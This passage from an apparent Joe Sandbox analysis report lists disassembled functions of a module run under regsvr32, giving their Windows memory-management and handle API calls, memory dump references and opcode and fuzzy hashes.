Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: f82a96a72682d0db7c7ff9fea9b17c50a83e734521e8d6853f983d2ceebc8a55
Instruction ID: a1959aa16aea62ed2e59daf8a6506a9135c65af9619d5a2efbfe1184264cea02
Opcode Fuzzy Hash: f82a96a72682d0db7c7ff9fea9b17c50a83e734521e8d6853f983d2ceebc8a55
Instruction Fuzzy Hash: BA211D11D0EDC2A0FA64EF9294543FE6271EF897C4F4460B2D94ECAADACF6EE4449201

Function 00007FF8A9307D4E Relevance: 7.6, APIs: 6, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307D71
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ebd2416ab2d20f0ec65be0d2a43d430ec7feebd4d2d0409fe4224a42e46aaa51
Instruction ID: e165035eb53fad0b8a95c4e1d91eca70ad97f574fb003dace07c14ff1507c222
Opcode Fuzzy Hash: ebd2416ab2d20f0ec65be0d2a43d430ec7feebd4d2d0409fe4224a42e46aaa51
Instruction Fuzzy Hash: C1212F11D0EEC2A0F624EF5694583FA6671EF887C4F4460B1D54ECAAD6CF7EE444D601

Function 00007FF8A93083A9 Relevance: 7.6, APIs: 6, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A930874B
HeapFree.KERNEL32 ref: 00007FF8A9308776
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: ff63bde76e835f7a430b9722b3f2cf0b18aff6174d83dea9eefaf501777179ae
Instruction ID: b97f01690732b359a875e84012733d11271c69fee2dbd0eaa698f5d651ede070
Opcode Fuzzy Hash: ff63bde76e835f7a430b9722b3f2cf0b18aff6174d83dea9eefaf501777179ae
Instruction Fuzzy Hash: 5F217111D0EEC2A0F660EF52D4543FA62B1EFC87C4F446071D54DC66AADF7DE0448240

Function 00007FF8A9346EBD Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF8A9346EBF
GetLastError.KERNEL32 ref: 00007FF8A9346ED7
GetCurrentProcess.KERNEL32 ref: 00007FF8A9347070
DuplicateHandle.KERNEL32 ref: 00007FF8A934709A
GetLastError.KERNEL32 ref: 00007FF8A93470A9

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ErrorHandleLast$CurrentDuplicateProcess
String ID:
API String ID: 3697983210-0
Opcode ID: 0f7f8291d15367c1020ca9e74800a4d2b37a0a4e878cf3ec27d6883e2ef5c46b
Instruction ID: 6bf0c3f14dc4dc601868df3d41576b8e7a9695520bf9bd13a9a91b7855046b93
Opcode Fuzzy Hash: 0f7f8291d15367c1020ca9e74800a4d2b37a0a4e878cf3ec27d6883e2ef5c46b
Instruction Fuzzy Hash: 7E118222B1FA8299FB609E71A4053BD25A1EB843E8F142235ED6D877C9DF7CD0858300

Function 00007FF8A9327956 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20filememoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932796C
UnmapViewOfFile.KERNEL32 ref: 00007FF8A932797F
CloseHandle.KERNEL32 ref: 00007FF8A9327987

Strings

assertion failed: end >= start && end <= len, xrefs: 00007FF8A932A830, 00007FF8A932A84D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFileFreeHandleHeapUnmapView
String ID: assertion failed: end >= start && end <= len
API String ID: 2029649301-206846142
Opcode ID: d40968a04be5c3a62ee5e1623a788bfebece889068f5bcd59a61bac421fa85c6
Instruction ID: b2b2edd4046c1c0258e72675dfd6caa77c6172a0369bc06765d586ca9d79aacc
Opcode Fuzzy Hash: d40968a04be5c3a62ee5e1623a788bfebece889068f5bcd59a61bac421fa85c6
Instruction Fuzzy Hash: 0EF03925A0EEC2A6E608AF22D4543FD6370EF89BC0F046032DE5F87392CE3CE0418201

Function 00007FF8A9327454 Relevance: 6.4, APIs: 5, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93274C1
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ea3b73ee264ef86e9660f00be7f1634d365b9ce8d7c3fbb965065c558432b960
Instruction ID: cf6437e2bf334ca936883391f3145f61282328d00a29c96dd0cd7fbe7deee5c8
Opcode Fuzzy Hash: ea3b73ee264ef86e9660f00be7f1634d365b9ce8d7c3fbb965065c558432b960
Instruction Fuzzy Hash: 64512A66E0EEC6A4FB60DF25D8513F922B1FF987C8F446036CA0E86795DE3DA545C240

Function 00007FF8A93276A0 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93276CF
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d62eaea2fd801f57e0c593681ac49efbe1e7a644230ff37243b0d065027e76c9
Instruction ID: b3d73fa4757987c4cf7338756da8e20e37d5f06852845c81109f1e9ecd829baf
Opcode Fuzzy Hash: d62eaea2fd801f57e0c593681ac49efbe1e7a644230ff37243b0d065027e76c9
Instruction Fuzzy Hash: F1412966E0EEC5A8FB20DF25D8553F822B1FB98B88F446036CA4E86795CF3DA545C300

Function 00007FF8A932A9D6 Relevance: 6.3, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 5ef5df8e38ee51008cd60846c0adde718a365eb0e9a2fa5e20bb93270715855e
Instruction ID: e621673fc071d46d27d8b979092b330eaf0ffbb57ea31aa07a3637f7d13ca656
Opcode Fuzzy Hash: 5ef5df8e38ee51008cd60846c0adde718a365eb0e9a2fa5e20bb93270715855e
Instruction Fuzzy Hash: 5941606290DFC1A5F7659F29D9453E82370FB98798F04A221DE8C87751DF35D295C300

Function 00007FF8A9301930 Relevance: 6.3, APIs: 5, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A930193E
HeapFree.KERNEL32 ref: 00007FF8A9301981
HeapFree.KERNEL32 ref: 00007FF8A9301999
HeapFree.KERNEL32 ref: 00007FF8A93019B3
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8A931AA8B), ref: 00007FF8A931AF53

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 038cf73d8487698e413ec926c4d1693066d51f5eeb28cc3b5a13dbcfb78fb6d5
Instruction ID: cbe6f629ee2cadfdcd7a01262c9ee92257d162c1d76c5580e46435f338666cc7
Opcode Fuzzy Hash: 038cf73d8487698e413ec926c4d1693066d51f5eeb28cc3b5a13dbcfb78fb6d5
Instruction Fuzzy Hash: 8531B026E0EEC2A1FA259F6694443B95671FF48BD0F286132CF1DD2790EE3DE081D240

Function 00007FF8A933F6D0 Relevance: 6.3, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,00007FF8A934F839), ref: 00007FF8A933F6E9
TlsGetValue.KERNEL32(00000000,?,?,?,00007FF8A934F839), ref: 00007FF8A933F70B
TlsGetValue.KERNEL32(00000000,?,?,?,00007FF8A934F839), ref: 00007FF8A933F75C
TlsSetValue.KERNEL32(00000000,?,?,?,00007FF8A934F839), ref: 00007FF8A933F777
HeapFree.KERNEL32(00000000,?,?,?,00007FF8A934F839), ref: 00007FF8A933F7A5

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Value$FreeHeap
String ID:
API String ID: 911738859-0
Opcode ID: ea0a8da814425dd029df1956a120a2e8baa3d0414911b5a299c57872757031cc
Instruction ID: bff3b6533b2a3ff7b67847409d38fcd5815af337054c41b6a0ab9012417b4321
Opcode Fuzzy Hash: ea0a8da814425dd029df1956a120a2e8baa3d0414911b5a299c57872757031cc
Instruction Fuzzy Hash: 6A314F21A4FED675FA54AF2198513BE22B1EF847C0F94A439D90EC67D2DE2DF8458200

Function 00007FF8A931C360 Relevance: 6.3, APIs: 5, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF8A931C378
TlsGetValue.KERNEL32 ref: 00007FF8A931C39A
TlsGetValue.KERNEL32 ref: 00007FF8A931C403
TlsSetValue.KERNEL32 ref: 00007FF8A931C41E
HeapFree.KERNEL32 ref: 00007FF8A931C434

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Value$FreeHeap
String ID:
API String ID: 911738859-0
Opcode ID: 68bc9a191baf23316aea98b4d88f8c3084cfd6d6a8e27a37dd0e5954c5720e83
Instruction ID: db09f3efff152076c618a6cd624c6a335d4f974c35dc7ddd94df501a45611af3
Opcode Fuzzy Hash: 68bc9a191baf23316aea98b4d88f8c3084cfd6d6a8e27a37dd0e5954c5720e83
Instruction Fuzzy Hash: 85319020E1FDC275FE55AF20A4112BA62B1EF847C4FA4B134D84EC26E2ED2DE5C6C211

Function 00007FF8A931F2C0 Relevance: 6.3, APIs: 5, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,00007FF8A934F4AA), ref: 00007FF8A931F2D9
TlsGetValue.KERNEL32(?,?,?,?,00007FF8A934F4AA), ref: 00007FF8A931F2FB
TlsGetValue.KERNEL32(?,?,?,?,00007FF8A934F4AA), ref: 00007FF8A931F34C
TlsSetValue.KERNEL32(?,?,?,?,00007FF8A934F4AA), ref: 00007FF8A931F367
HeapFree.KERNEL32(?,?,?,?,00007FF8A934F4AA), ref: 00007FF8A931F37D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Value$FreeHeap
String ID:
API String ID: 911738859-0
Opcode ID: b1d3348ff56e7c3df9743349acb2e37245fb3ab402315e1683676d6b14bcbc2e
Instruction ID: 5edee23884b7e6143755214cd53269c770dadb7bcff6e5decf842ade0a916503
Opcode Fuzzy Hash: b1d3348ff56e7c3df9743349acb2e37245fb3ab402315e1683676d6b14bcbc2e
Instruction Fuzzy Hash: 00212D20A0FED2B5FE54AF2198113BD62B1EF487C4F64B538C94EC67E2EE2DE5458210

Function 00007FF8A931F000 Relevance: 6.3, APIs: 5, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,00007FF8A934F656), ref: 00007FF8A931F019
TlsGetValue.KERNEL32(00000000,?,?,?,00007FF8A934F656), ref: 00007FF8A931F03B
TlsGetValue.KERNEL32(00000000,?,?,?,00007FF8A934F656), ref: 00007FF8A931F08C
TlsSetValue.KERNEL32(00000000,?,?,?,00007FF8A934F656), ref: 00007FF8A931F0A7
HeapFree.KERNEL32(00000000,?,?,?,00007FF8A934F656), ref: 00007FF8A931F0D5

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Value$FreeHeap
String ID:
API String ID: 911738859-0
Opcode ID: 735c025b4d040f25c0cab026f25b8a2cc3874044b410ebbb7ca0f50dfce732b0
Instruction ID: 78c76e5c50eee8dc2b04506b66a0fe199ec9e5c2f290e14965a69f374ca010f1
Opcode Fuzzy Hash: 735c025b4d040f25c0cab026f25b8a2cc3874044b410ebbb7ca0f50dfce732b0
Instruction Fuzzy Hash: 64217120E0FE9265FE58AF1198513BD52B1EF447C4F54A435C90DC77E2EE2DE8818210

Function 00007FF8A93434AA Relevance: 6.3, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A93434B0
CloseHandle.KERNEL32 ref: 00007FF8A93434C5
HeapFree.KERNEL32 ref: 00007FF8A9343560
HeapFree.KERNEL32 ref: 00007FF8A9343585
CloseHandle.KERNEL32 ref: 00007FF8A934390C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: e6e65661dac2eb6877ed46c105a7693a807842a407bcf39b5e69bac055bdeddc
Instruction ID: 75a51814f16af6ab731863068dbc64316e2438759da02bafb45212ac490af8f3
Opcode Fuzzy Hash: e6e65661dac2eb6877ed46c105a7693a807842a407bcf39b5e69bac055bdeddc
Instruction Fuzzy Hash: 3D316F22A1EEC1E8FB64DF65D8443FD23B0EB84789F516076CA0D9B6A5CF389585C601

Function 00007FF8A9307F65 Relevance: 6.3, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

